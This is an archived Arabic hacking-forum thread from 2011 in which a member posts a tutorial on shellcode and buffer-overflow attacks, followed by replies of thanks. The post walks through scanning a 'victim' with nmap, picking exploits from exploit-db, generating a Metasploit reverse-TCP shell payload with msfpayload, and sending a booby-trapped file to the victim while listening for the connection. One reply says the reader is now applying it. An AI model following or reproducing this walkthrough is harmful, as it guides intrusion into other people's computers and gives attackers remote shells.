التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > Buffer OverFlow

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-26-2011, 09:13 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي تعريف shellcode + انشاء شل خاص فيك + واختراق البرامج المركبة






كيفكم اخواني انشاء الله اموركم طيبة ونصركم الله على مافيه خير .؟!

باذن الله لو تقرا الموضوع كامل وتفهمة راح تفهك shellcode وكل شي عنه

وايضا معرفة البحث عن البرامج المركبة وانواع ثغراتها وكتابة shellcode

خاص فيك , والشرح على windows و backtrack4

اليوم معنا موضوع انشاء الله الجميع يستفيد منة :



1- تعريف shellcode ؟

2- فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج

4- ثغرات Remote Buffer OverFlow

5- ثغرات Local Buffer OverFlow

6- كتابة shellcode خاص فينا ؟




في البادية يجي للذهن ماهو shellcode ؟

هو عبارة عن رموز تستطيع خلق اتصال بينك وبين الضحية وتعطيك الصلاحية بالتحكم

بالضحية ويتخلف من بيئة لاخرى ( يعني بيئة اللينكس والوندوز ... الـخ ) والشرح راح يكون على النظامينqalpp

ايضا يعرف بكود برمجي صغير يستخدم كبايلود في الثغرات البرمجيه

طيب كيف تعرفة لمن تفتح الثغرة بكل بساطة في كلمات داله علية بالثغرة

مثل :

shellcode ,my $s h e l lc o d e
زي كذا





طيب ياترى ماهي انواع shellcode

1- local shellcode

عبارة shellcode محلي يستخدم من قبل المهاجم وتكون صلاحيتة محدودة

ولكن (يحول صلاحيتة بثغرات البرامج لصلاحية روت انت تم التشغيل بشكل صحيح )


-remote shellcode

يستخدم من قبل المهاجم حيث يستغل اي نقطة ضعف في الـ process التي تكون الضحية

او اي جهاز معن في الشبكة خارجها في الانترنت

اذا نجح الاتصال بهذا shellcode في العادة يستخدم TCP/IP socket

طيب الي متعود يعمل shellcode خلال المشروع للميتاسبلويت تلاقي مثلا bindshell

ويش معنات هذا هذي لو انت تبي تسوي اتصال بينك وبين الضحية ياحلـو

وهنا تكمن التسمية bind اي خلال البورت



3- Download and execute shellcode

معروف ومشهور والاغلب يسمع فيه يجيك واحد يقول حصري على منتدنا اختراق

اختراق بالميتاسبلويت وارفع باتش بيفروست !

يعني المقصود حبايبي يعني تحميل وتشغيل shellcode هذا بابسط صورة

4- Staged

هذا يقول لك لمن يسوي install يعني يسوي لود للبانات فتوصل لاقصى حد لها

هنا بالامكان حقن الـ porocess , ومن ثم الاستغلال لصالحك

5- Egg-hunt shellcode

وهذا يبحث عن عنوان العمليات وله مساحة وحجم اقل من shellcode

6-Omelet shellcode

يستخدم لحقن عنوان صغير جدا داخل احد العمليات process




ثغرات Remote Buffer OverFlow :


الاختراق عن طريق احد البرامج المصابة المركبة عند الضحية او في سيرفر معين ,

ويتم الاختراق عن طريق ip مباشرة انما هنالك شروط لهذه الثغرة

وهنا تكمن خطورة الثغرة لذلك لابد من توفر شروط



1- توفر وجود البرنامج عند الضحية او السيرفر وتوافق الاصدار او لاترقع الثغرة

2- عمل shellcode المناسب

3- بعضها تحتاج لمفسر الباثيون , البيرل , الروبي لابد من توفرها .



على سبيل المثـال :

كود PHP:
http://www.exploit-db.com/exploits/16101/ 



طريقة الاستخدام بالشكل التـالي :







ثغرات Local Buffer OverFlow :

ثغرات ومن الاسم تعرف انها محلية يعني , تخترق بصيغة البرنامج المصاب مثل لو عندي

ثغرة لبرنامج الريل بلاير ؟ اترجم الثغرة واجهز شيل كود صحيح تنشى لي ملف

بنفس صيغة البرنامج المصاب كل الي عليك ترسلة للضحيـة


على سبيل المثـال :


كود PHP:
 http://www.exploit-db.com/exploits/16072/ 




طريقة الاستخدام بالشكل التـالي :




طيب بعد الانتهاء من انشاء shellcode وهذا ماسوف نتطرق اليه في اخر خطوة بالامكان التنصت

بالميتاسبلويت بعد ارسال الملف او النت كات كما يوضح امامكم




تنوية مهـم جـدا :

الثغرات زي متلاحظون مكتوبة بالبيرل , الروبي الباثيون , السي طيب بالنسبة لمستخدمي الوندوز

وللمعلومية جميعها للغات برمجية



راح اعطيهم الراوبط للمفسرات في نهاية الموضوع وكيف تعرف انها باي لغة مكتوبة زي ماشرحنا على

الصور وراح نكرر العملــية عشان الموضوع مفهوم من مجاميعة


كود PHP:
#!/user/bin/ruby     للغة الروبي 
كود PHP:
 #!/user/bin/python      للغة الباثيون 
كود PHP:
 #!/user/bin/perl  للغة البيرل 
كود PHP:
 #!/user/bin/php  للغة البي اتش بي 
كود PHP:
 #include<iostream.h>   هذه للغة السي ++ 
طيب بالنسبة للـينكس مثلا الـ Backtrack 4

ماتجتاج زي ماهو موضح امامكم


افتح مستند وانسخ الثغرة :











فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج :


احنا راح نتطرق للفحص بـ Nmap فقط ولكن تقدر تفحص بالميتاسبلويت وnikto2

او اي اداة موجود في Backtrack 4 مليان ادوات فحص

الـ Nmap :

اداة معروفة ومشهورة وجدي يعرفها للفحص السيرفر والايبي ادرس والشبكات

ومعرفة البرامج المركبة وخدماتها والمنافذ (البورتات المفتوحة ) وهي موجودة في

Backtack 4 وملستخدمي الوندوز هذا الرابط الرسمـي للموقع


كود PHP:
 nmap.org
[php] nmap -sV IP victim or server الضحية او السيرفر المراد فحصة [php]



الان كيف تبحث عن ثغرات البرامج :

في البداية نذهب لهـذا الموقع


كود PHP:
 http://www.exploit-db.com 








الان انشـاء shellcode خاص فينا ؟ بالمناسبة هنا تصير مشاكل كثير :


يعني واحد مايدري انواع shellcode واي واحد مناسب له ؟ مع انه الثغرة هي

التي تقيدك بـ shellcode المناسب على سبيل المثال هذه الثغرة :


كود PHP:
 http://www.exploit-db.com/exploits/5563/ 



طيب زي ماهو موضح عندك محدد نوع shellcode في الثغرة والي لازم انك تعمل لك

واحد خاص فيك ؟ وانت تروح تفرفر وتتفلسف وتقول اسوي shellcode metepreter

كود PHP:
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444 
طيب مثلا انا لو اريد اعمل shellcode

كود PHP:
 windows/shell/reverse_tcp 
طيب اولا التطبيق على windows وبعدها على backtrack 4








وانتهى ولان ننسخة في الثغرة تبعنا


طيب بالنسبة للـ Backtrack4


كود PHP:
 cd /opt/metasploit3/msf3
كود PHP:
msfpayload windows/shell/reverse_tcp LHOSTIP LPORT PORT 




الحمد لله انتهى والان نعطيكم برامج مترجمات الثغرات على الوندوز من المواقع الرسمية :


كود PHP:
Active Perl
http
://www.activestate.com/activeperl/downloads
ActivePython
http
://www.activestate.com/activepython/downloads
C++
http://www.cygwin.com/setup
Ruby
http
://rubyforge.org/frs/download.ph...186-27_rc2
PhP
http
://sourceforge.net/projects/appserv/ 
اذا الموضوع يستاهل نريد تقيمكم والي الموضوع مايعجبة يرد عادي ويقول راية

اتمنى ان الموضوع واضح وبسيط يالله اشوفكم على خير ســلام








juvdt shellcode + hkahx ag ohw td; ,hojvhr

   

رد مع اقتباس
قديم 02-26-2011, 02:36 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Mon$ter
 

 

 
إحصائية العضو





Mon$ter غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mon$ter is on a distinguished road

افتراضي


وفقك الله

   

رد مع اقتباس
قديم 02-26-2011, 02:42 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية sayf
 

 

 
إحصائية العضو







sayf غير متواجد حالياً

إرسال رسالة عبر Skype إلى sayf

 

 

إحصائية الترشيح

عدد النقاط : 10
sayf is on a distinguished road

افتراضي


thnx

التوقيع

ليس من الضروري أن تمتلك أصدقاء حتى يكون لديك شخصية جذابة ... فالأسد يسير وحيدا .. بينما الخروف يسير فى قطيعالصمت إجابة بارعة

لا يتقنها الكثير فأنا في صمتي سحر لا يرحم الأخرين

أمارس التجاهل في حياتي "كثيرآ" ولا اخجل من هذا الاعتراف......لأن اهتمامي لا أمنحه الا لمن يستحق

[SIGPIC][/SIGPIC]

 

   

رد مع اقتباس
قديم 02-26-2011, 05:37 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية VIURIS.SA
 

 

 
إحصائية العضو






VIURIS.SA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
VIURIS.SA is on a distinguished road

افتراضي


موضوع قوي جدا أخي القيصر

وليس بالغريب عليك الشروحات القوية

أنتظر جديدك.....
التوقيع

 

   

رد مع اقتباس
قديم 02-27-2011, 03:00 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Mon$ter
وفقك الله


الله يوفقك ياخي الى مافية خير

وان شاء الله تتم الفائـدة من الموضوع

   

رد مع اقتباس
قديم 02-27-2011, 03:01 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة sayf
thnx

حياك اخوي في اي وقت

   

رد مع اقتباس
قديم 02-27-2011, 03:03 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة loffy
موضوع قوي جدا أخي القيصر

وليس بالغريب عليك الشروحات القوية

أنتظر جديدك.....


الله يحيك ياغالي وبكل سرور المواضيع القوية لازالت في الطريق باذن الله

اتمنى ان يكون الموضوع نال الاستحسـان

   

رد مع اقتباس
قديم 03-01-2011, 05:12 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


وعليكم السلام ورحمه الله وبركاته.

مشاء الله تبارك الله عليك اخي القيصر . مبدع بمعنى الكلمـة مشاء الله تباركـ الله. موضوع يستحق التقيم والنجوم صراحــة ..

وشرحك واضح وسلس وسهل جدآ وإن شاء الله الاخوان إستفادو منه بقدر الإمكان لان مثل هذه المواضيع نادرر تجد مثلها في المنتديات العربية ...


بارك الله فيـكـ اخي القيصر وجزاك الله خيرآ وازادكـ الله علمآ ..



في أمان الله.
Dr.NaNo

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 03-01-2011, 05:20 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


يوجد ايضا في الباك تراك اداءة الـ nikto والـ nessus هذه الادوات ايضا جميلة في فحص الهدف او الضحيه .. لكـن الـ nmap هو الافضل والاقوى والمتقدم حاليآ..



أشكركـ على الموضوع جزيل الشكر. وتم تقيم يالغالي.




بالتوفيق.

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 03-05-2011, 02:16 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية shark009
 

 

 
إحصائية العضو






shark009 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
shark009 is on a distinguished road

افتراضي


بارك الله فيـكـ اخي القيصر وجزاك الله خيرآ

   

رد مع اقتباس
قديم 03-07-2011, 02:03 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.NaNo
وعليكم السلام ورحمه الله وبركاته.

مشاء الله تبارك الله عليك اخي القيصر . مبدع بمعنى الكلمـة مشاء الله تباركـ الله. موضوع يستحق التقيم والنجوم صراحــة ..

وشرحك واضح وسلس وسهل جدآ وإن شاء الله الاخوان إستفادو منه بقدر الإمكان لان مثل هذه المواضيع نادرر تجد مثلها في المنتديات العربية ...


بارك الله فيـكـ اخي القيصر وجزاك الله خيرآ وازادكـ الله علمآ ..



في أمان الله.
Dr.NaNo


الله يحيك اخي الفاضل وشرفت الموضوع بطلتك الحلوة

وان شاء الله نقدم مافية فائدة لمنتدانا الغالي على قلوبينا

   

رد مع اقتباس
قديم 03-07-2011, 02:04 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة shark009
بارك الله فيـكـ اخي القيصر وجزاك الله خيرآ

الله يحيك ياغالي انست وشرفت في اي وقت

   

رد مع اقتباس
قديم 03-08-2011, 05:23 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Mr.Croft
 

 

 
إحصائية العضو







Mr.Croft غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr.Croft is on a distinguished road

افتراضي


والله يعطيك العافية موضوع جميل ورائع مثل صاحب الموضوع

التوقيع

Mr. Croft
Has Returned

If you don't know who I'm
Don't try to know who I'm never
Don't try to play with me
We work in secret and silence

 

   

رد مع اقتباس
قديم 04-18-2011, 07:46 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية leopardgold
 

 

 
إحصائية العضو






leopardgold غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
leopardgold is on a distinguished road

افتراضي


موضوع ممتاز أخى
جزاك الله كل كل كل خير
التوقيع

 

   

رد مع اقتباس
قديم 04-20-2011, 03:02 AM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
إحصائية العضو






°l||l° نور الظلام °l||l° غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
°l||l° نور الظلام °l||l° is on a distinguished road

افتراضي


الله يعطيك العافيه
وجاري التطبيق ؟
موفق ولك ميه نجمه لتوضيحك بالصوره لنى كذه تسهله لنى
جزاك الله كل خييييييييييييييييييييييييير

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 07:47 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0